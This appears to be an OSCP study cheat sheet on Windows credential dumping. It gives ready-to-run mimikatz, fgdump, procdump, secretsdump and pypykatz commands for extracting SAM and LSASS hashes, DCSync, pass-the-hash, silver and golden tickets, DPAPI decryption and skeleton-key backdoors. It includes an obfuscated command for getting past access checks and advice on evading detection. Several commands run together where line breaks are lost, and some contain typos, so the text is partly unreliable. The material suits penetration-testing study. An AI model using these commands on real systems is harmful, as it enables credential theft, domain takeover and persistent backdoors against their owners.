Windows tool. Password hash extraction from the Local Security Authority Subsystem (LSASS) process memory where they are cached.
Officially allowed during the exam according to the OSCP Exam FAQ.
Windows XP
For older versions of Windows (XP, Server 2003), use pwdump, fgdump, and Windows Credential Editor (wce).
Fgdump
Copy fgdump from Kali to target.
/usr/share/windows-resources/binaries/fgdump/fgdump.exe.\fgdump.exeDump registry
Dump the registry, then transfer to Kali.
If you get “Access denied”, try bypassing it using tricks like this:
r^eg sa””ve HKL “”M\S””YS””TEM S””YS””TEM
reg.exe save hklm\sam sam.save
reg.exe save hklm\security security.save
reg.exe save hklm\system system.saveimpacket-secretsdump -sam sam.save -security security.save -system system.save LOCALDownload
Download an older version if you get errors.
Or try the 32-bit version (even on x64 architecture)…
cp /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe /home/kali/share/mimikatz-win32.exeUsage
Requires an administrative command prompt.
- privilege::debug: enable the SeDebugPrivilge access right required to tamper with another process
- token::elevate: elevate the security token from high integrity (administrator) to SYSTEM integrity for all users currently logged into the machine (could be an administrators of other machines)
Dump the SAM database
mimikatz.exe
privilege::debug
token::elevatelsadump::sammimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit > \\tsclient\myshare\mimi_lsadump_sam.txtDump password hashes of logged in users
A MUST!!!
If error: “mimikatz # ERROR kuhl_m_sekurlsa_acquireLSA ; Key import”, use the older version of mimikatz (see top of page).
mimikatz.exe
privilege::debug
sekurlsa::logonpasswordsmimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > \\tsclient\myshare\mimi_logonpasswords.txtgrep -E "User Name|NTLM" mimi_logonpasswords.txtDump password hashes (Run as Administrator)
Useful on the DC!
mimikatz.exe
privilege::debug
lsadump::lsa /patchmimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > \\tsclient\myshare\mimi_lsadump.txtDump all password hashes
Capture hashes remotely from a workstation. Use for persistence in AD. Log in as a user that is in the Domain Admins group on a workstation.
lsadump::dcsync /user:Administratormimikatz.exe "privilege::debug" "lsadump::dsync /user:Administrator" exit > \\tsclient\myshare\mimi_lsadump_dcsync.txtDump passwords of logged in users (from LSASS)
mimikatz.exe
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswordsDump user tickets stored in memory
mimikatz.exe
privilege::debug
sekurlsa::ticketsmimikatz.exe "privilege::debug" "sekurlsa::tickets" exit > \\tsclient\myshare\mimi_tickets.txtDownload service tickets in memory to file
No need to be an administrator 😉
kerberos::list /exportOverpass the Hash
See Overpass the Hash.
sekurlsa::pth /user:john /domain:example.com
/ntlm:a...123 /run:PowerShell.exeSilver Tickets
Domain SID
Get the SID of the current user and remove the last 4 digits to get the domain SID.
whoami /userGenerate the RC4 hash from password
If the password is known and the RC4 hash was not already obtained.
mimikatz.exe
kerberos::hash /password:MyBadPasswordGenerate the Silver Ticket
The command says “golden” but it is a silver ticket. /ptt will load the ticket in memory.
mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:fakeuser /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:<domain from SPN> /service:HTTP /rc4:<password RC4 hash> /ptt
kerberos::listGolden Tickets
Use this technique for persistence in Active Directory. Requires:
- Password hash of the krbtgt account
- SID of the domain
Domain SID
Get the SID of the current user and remove the last 4 digits to get the domain SID.
whoami /userPassword hash of krbtgt
Run as Administrator on the domain controller.
mimikatz.exe
privilege::debug
lsadump::lsa /patchGenerate the Golden Ticket
/ptt will load the ticket in memory. When trying to evade detection, use the name and ID of an existing system administrator.
mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:<fakeuser> /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /krbtgt:<NTLM hash> /ptt
kerberos::listUse the Golden Ticket
Use PsExec from Sysinternals. Do NOT use the IP address.
psexec.exe \\<domain controller hostname> cmd.exeWindows Credential Manager
Users may save RDP connections details for quick authentication. These credentials are stored in an encrypted form in the Credential Manager of Windows by using the Data Protection API. See Dumping RDP Credentials.
Find all files containing credentials
dir /a C:\Users\<USERNAME>\AppData\Local\Microsoft\CredentialsFile name looks like “0ABC123ABC123ABC123ABC123ABC123”.
Start Mimikatz
mimikatz.exeFor each file previously found, take note of guidMasterKey
Take note of the guidMasterKey for each file. Looks like “{a0a0a0a0-b1b1-c2c2-d3d3-e4e4e4e4e4e4}”.
dpapi::cred /in:C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\<FILENAME>List all master keys
Find the masterkey with GUID=guidMasterKey
sekurlsa::dpapiDecrypt using the Master Key
dpapi::cred /in:C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\<FILENAME> /masterkey:<MASTER KEY>The information should be decrypted.
Skeleton Key Attack
Used for AD persistence. Runs in memory, so lost after reboot.
- Unlocking All the Doors to Active Directory with the Skeleton Key Attack
- Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
Run on every Domain Controller
The attacker must have Domain Admin rights.
mimikatz.exe
privilege::debug
misc::skeletonmimikatz.exe "privilege::debug" "misc::skeleton" exitAfter that, you can authenticate as any user with the default password of Mimikatz.
net use x: \\<DC>\admin$ /user:<real username> mimikatznet use \\<DC>\c$ mimikatz /user:<real username>\Administratorrunas /user:<domain>\<real username> C:\Windows\System32\cmd.exe
[mimikatz]Other options to dump credentials
Option 1 – Task Manager
- Open Task Manager
- Under Processes, right-click on lsass.exe
- Select Create Dump File
- File will be created in C:\Users\Administrator\AppData\Local\Temp\lsass.DMP
Option 2 – Procdump from Sysinternals
- Open Task Manager
- Under Processes, click on menu View->Select Columns and add the column PID
- Upload procdump.exe from Sysinternals
cmd.exe "Run as Administrator"
procdump.exe /ma -accepteula <lsass process ID>
procdump.exe /ma -accepteula 464Will create file lsass.exe_YYMMDD_HHMMSS.dmp
Read the .DMP file
Credentials can be retrieved from the .DMP file with Mimikatz. The first line loads the memory dump, and the second one retrieves the secrets.
mimikatz.exe
sekurlsa::minidump lsass.DMP
sekurl::logonpasswords
exitPypykatz
NOT TESTED
Python implementation of Mimikatz.
On the victim machine
Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrepList all tokens
pypykatz live token listSpawn a SYSTEM shell
pypykatz live process createPrint registry credentials
pypykatz live registryList all users ever logged on the target
pypykatz live users listCurrent user in domain:username:SID format
pypykatz live users whoamiOffline – on Kali or any other machine
# Parse mimidump file
pypykatz lsa minidump <input_file>
# List domain users prone to SPNRoast or ASRepRoast
pypykatz ldap TEST/victim/pw:@10.10.10.2 spn
pypykatz ldap TEST/victim/pw:@10.10.10.2 asrep
# Decrypt gpp-pass
pypykatz gppass <base64_enc_password>